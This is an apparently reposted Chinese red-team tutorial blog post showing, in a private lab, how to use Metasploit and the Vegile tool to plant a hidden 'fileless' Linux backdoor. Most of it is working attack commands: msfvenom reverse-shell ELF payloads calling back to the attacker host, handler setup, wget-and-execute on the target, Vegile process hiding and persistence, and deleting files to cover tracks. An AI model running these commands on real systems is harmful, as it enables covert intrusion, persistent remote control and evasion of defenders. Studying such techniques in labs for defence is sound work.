汕尾海湾 发表于 2024-12-20 15:42:54

红队/白帽必经之路(22)——实战之怎样通过Metasploit 及Vegile 维吉尔工具

 
https://i-blog.csdnimg.cn/direct/7082c65f8c854808a3cc834343a8599d.gif
 
   欢迎各位彦祖与热巴畅游本人专栏与博客

你的三连是我最大的动力

以下图片仅代表专栏特色 [点击箭头指向的专栏名即可闪现]

    专栏跑道一

 
➡️网络空间安全——全栈前沿技术持续深入学习 

https://i-blog.csdnimg.cn/direct/67f4df3eb193446c94ac0f41b7f523fa.png
   
专栏跑道二


➡️ 24 Network Security -LJS 

https://i-blog.csdnimg.cn/direct/90c1d22fc5254f52bf9896c2671edfad.png​
https://i-blog.csdnimg.cn/direct/724e91f01bbc4e17864b130cf81db74b.png​ 
https://i-blog.csdnimg.cn/direct/b354f26fa5a141a9af122692f3a519f8.png​
    专栏跑道三


➡️ MYSQL REDIS Advance operation

https://i-blog.csdnimg.cn/direct/8fd93e63521b4287a8de332b99cf1786.png
    专栏跑道四

 
➡️HCIP;H3C-SE;CCIP——LJS[华为、华三、思科高级网络]

https://i-blog.csdnimg.cn/direct/3e0f9840dd7440c986819ef3c9ddf38e.png​
    专栏跑道五


➡️RHCE-LJShttps://i-blog.csdnimg.cn/direct/58856247df744cd1a3e5ad7c6259330a.webp​

    专栏跑道六

 
➡️数据布局与算法[考研+实际工作应用+C程序设计]

https://i-blog.csdnimg.cn/direct/4d0f4deb48764890b68bc98b53f2ceed.png​
    专栏跑道七

 
➡️RHCSA-LJS

https://i-blog.csdnimg.cn/direct/53322bd2df734d7c95c3247ff386d0f6.png

https://i-blog.csdnimg.cn/direct/6925bcc063c9420da504e5bbd0fe1fe7.gif
 
上节回顾

 
   目次
欢迎各位彦祖与热巴畅游本人专栏与博客
你的三连是我最大的动力
以下图片仅代表专栏特色 [点击箭头指向的专栏名即可闪现]
专栏跑道一
➡️网络空间安全——全栈前沿技术持续深入学习 
专栏跑道二
➡️ 24 Network Security -LJS 
专栏跑道三
➡️ MYSQL REDIS Advance operation
专栏跑道四
➡️HCIP;H3C-SE;CCIP——LJS[华为、华三、思科高级网络]
专栏跑道五
➡️RHCE-LJS​编辑​
专栏跑道六
➡️数据布局与算法[考研+实际工作应用+C程序设计]
专栏跑道七
➡️RHCSA-LJS
上节回顾
1.实战-Linux 无文件木马程序
1.1环境准备
按照之前学习的方法生成一个恶意文件让目标体系执行来获取 shell
再生成一个用来隐藏执行的后门
补充:
 1.2启动 apache
上传 Vegile 维吉尔工具到网站目次下方便 centos 下载
注意:
1.3获取 Linux 体系的 shell
MSF 设置监听
先安装下载工具
 添加执行权限
利用 sessionID 连接 centos
参数详解:
注意:

扩展:
注意:

1.4创建无文件后门程序
补充:
回到前面建立的 session 中下载用于隐藏历程的工具
解压+cd+x
下载用于隐藏执行的后门程序+x
隐藏执行后门程序

回到另一个 MSF 控制台查看 session

查看一下我们注入到了哪个历程

 删除我们下载的所有文件
注意:
举例:
 
 
https://i-blog.csdnimg.cn/direct/4564e43bf982495db922195c39f43d88.gif
1.实战-Linux 无文件木马程序


1.1环境准备

    


[*]Kali:192.168.1.53
[*]Centos:192.168.1.63
[*] 按照之前学习的方法生成一个恶意文件让目标体系执行来获取 shell
                                                                                                         ┌──(root㉿kali-2024)-
└─#msfvenom -a x64 --platform linux -p linux/x64/shell/reverse_tcp LHOST=192.168.1.53 LPORT=8080 -b "\x00" -f elf -o /var/www/html/xuegod-backdoor
Found 3 compatible encoders
Attempting to encode payload with 1 iterations of x64/xor
x64/xor succeeded with size 175 (iteration=0)
x64/xor chosen with final size 175
Payload size: 175 bytes
Final size of elf file: 295 bytes
Saved as: /var/www/html/xuegod-backdoor
https://i-blog.csdnimg.cn/direct/ffaaff7e851945aca4dcdc46b3bbc616.png
https://i-blog.csdnimg.cn/direct/60e41eed520745c6a0f619d541c14e4d.gif
再生成一个用来隐藏执行的后门

补充:
    


[*]ghost 是什么意思? 还原体系?
 
┌──(root㉿kali-2024)-
└─# msfvenom -a x64 --platform linux -p linux/x64/shell/reverse_tcp LHOST=192.168.1.53 LPORT=4444 -b "\x00" -f elf -o /var/www/html/xuegod-ghost                                             
Found 3 compatible encoders
Attempting to encode payload with 1 iterations of x64/xor
x64/xor succeeded with size 175 (iteration=0)
x64/xor chosen with final size 175
Payload size: 175 bytes
Final size of elf file: 295 bytes
Saved as: /var/www/html/xuegod-ghost
https://i-blog.csdnimg.cn/direct/9fa0c277988b46b284e20f2ddb2a9157.png
 1.2启动 apache

                                                                                                               
┌──(root㉿kali-2024)-
└─#systemctl start apache2
                                                                                                               
┌──(root㉿kali-2024)-
└─# systemctl enable apache2   #设置开机启动,
Synchronizing state of apache2.service with SysV service script with /usr/lib/systemd/systemd-sysv-install.
Executing: /usr/lib/systemd/systemd-sysv-install enable apache2
Created symlink '/etc/systemd/system/multi-user.target.wants/apache2.service' → '/usr/lib/systemd/system/apache2.service'.
                                                                                                               
┌──(root㉿kali-2024)-
└─#systemctl is-enabled apache2
enabled
          https://i-blog.csdnimg.cn/direct/f6410f1d1af94531be734af87dd52594.png
上传 Vegile 维吉尔工具到网站目次下方便 centos 下载

   

[*]Vegile 官方下载链接
[*]Vegile 常用方法:

[*]./Vegile --i 隐藏你的后门
[*]./Vegile --u 无穷复制你的 metasploit 会话,即使他被 kill,依然可以再次运行
注意:
    


[*]木马肯定要放在 Vegile 目次下
[*] Vegile 一样平常用于维持 meterpreter 会话
┌──(root㉿kali-2024)-
└─#cd /var/www/html/
                                                                                                               
┌──(root㉿kali-2024)-
└─# rz                  
https://i-blog.csdnimg.cn/direct/e18369e53ee14b39985dba37a787ca53.png
https://i-blog.csdnimg.cn/direct/3a6b8ea2bc954e08b7fecef472b70204.gif
1.3获取 Linux 体系的 shell

MSF 设置监听

msf6 exploit(windows/smb/psexec) > back
msf6 >use exploit/multi/handler
[*] Using configured payload linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set payload linux/x64/shell/reverse_tcp
payload => linux/x64/shell/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 192.168.1.53
LHOST => 192.168.1.53
msf6 exploit(multi/handler) > set LPORT 8080#改成8080,防止和上面实验的 4444 端
口冲突
LPORT => 8080
msf6 exploit(multi/handler) >exploit -j#在后台运行 handler,发现现在并没有 session,
因为客户端还没有执行
https://i-blog.csdnimg.cn/direct/de96b7c1904e4707a1e9b3c67c555851.png
 
   

[*]到 centos 操作体系下载执行文件来建立 session,为了模拟实战结果隐藏行为通过该 session进行操作
先安装下载工具

┌──(root㉿kali-2024)-
└─# wget 192.168.1.53/xuegod-backdoor

                                                                                    

 添加执行权限

┌──(root㉿kali-2024)-
└─# chmod +x xuegod-backdoor   
                             
https://i-blog.csdnimg.cn/direct/12c2b1c5c7d84d8b8344d11e9eb6f3cb.gif执行完成后获取到 session
┌──(root㉿kali-2024)-
└─# ./xuegod-backdoor     利用 sessionID 连接 centos

msf6 exploit(multi/handler) >sessions -i 2 参数详解:
    


[*]-i <opt> Interact with the supplied session ID
注意:
   

[*]这个 payload 中的 shell 是没有 bash 提示符的
https://i-blog.csdnimg.cn/direct/8b061756d2394c5aac4a81d53bcda5b2.png
 
扩展:

   

[*]怎样查看我们当进步程的名字和 PID?
查看网络连接状态:

netstat -antup | grep 8080 https://i-blog.csdnimg.cn/direct/c1440b83fa6c4b77a0ce6590709276f1.png
   

[*]可以看到我们的 pid 是 2406
ps -aux | grep 2406 https://i-blog.csdnimg.cn/direct/630c2ddd2be4427abf1877bc276d5cff.png
   

[*]查看 IP 地址,发现找不到https://i-blog.csdnimg.cn/direct/cc50fcd78fa54b37b891b8ae82ae71c6.png
[*]但是可以可以利用绝对路径
https://i-blog.csdnimg.cn/direct/cb058205253d4b068d48d4b24fae4858.png
 
注意:
   

[*] 上图的 session 要保持连接,先不要断开!后期面要利用到

https://i-blog.csdnimg.cn/direct/4aa0a40075d14d8598117aa1f3537364.gif
1.4创建无文件后门程序

补充:

   

[*] 新建终端窗口,MSF 控制台可以启动多个互不影响
[-] Parse error: Unmatched quote: "' use exploit/multi/handler"
msf6 > use exploit/multi/handler
[*] Using configured payload linux/x64/shell/reverse_tcp
msf6 exploit(multi/handler) >set payload linux/x64/shell/reverse_tcp
payload => linux/x64/shell/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 192.168.1.53
LHOST => 192.168.1.53
msf6 exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf6 exploit(multi/handler) > exploit -j
回到前面建立的 session 中下载用于隐藏历程的工具

wget 192.168.1.53/Vegile-master.zip https://i-blog.csdnimg.cn/direct/a61e1879064a4f458486ec5d921dbee0.png
解压+cd+x

unzip Vegile-master.zip

cd Vegile-master

chmod +x Vegile 下载用于隐藏执行的后门程序+x

wget 192.168.1.53/xuegod-ghost

chmod +x xuegod-ghost 隐藏执行后门程序

https://i-blog.csdnimg.cn/direct/f6326216071241c1a7f60242d52be3ee.png

   

[*]这里是退出 Vegile,不是退出当前的 session。
回到另一个 MSF 控制台查看 session

https://i-blog.csdnimg.cn/direct/4ac1ac8fd8964145bf1cd6119d04b413.png

   

[*]目标端口为 52038
查看一下我们注入到了哪个历程

msf6 exploit(multi/handler) >sessions -i 3
https://i-blog.csdnimg.cn/direct/e401edc5c06444d4ba42d1d46835f1f9.png

   

[*]同样是一个 sh 历程

https://i-blog.csdnimg.cn/direct/108ef15f75c144e7a4da4dde98ca8f50.gif
 
 删除我们下载的所有文件

rm -rf /root/Vegile-master   

[*]如遇到错误提示:
[*] ERROR: ld.so: object '/usr/local/lib/libprocesshider.so' from/etc/ld.so.preload cannot be preloaded: ignored.
[*]解决方法:
[*] echo "" > /etc/ld.so.preload # 64 位系统没有这个文件导致报错
[*] 
注意:

   

[*]删除时,也会把 xuegod-ghost 这个后门程序删除了。
[*]虽然文件被删除了,但会话,还是建立着了。
[*]删除我们所有文件之后程序仍旧正常执行。
举例:
https://i-blog.csdnimg.cn/direct/f48f6c5c8c4c4deeb0ef4860915e0710.gif
https://i-blog.csdnimg.cn/direct/ec296943668244dd84cef6d21c966b2f.gif
 

免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
页: [1]
查看完整版本: 红队/白帽必经之路(22)——实战之怎样通过Metasploit 及Vegile 维吉尔工具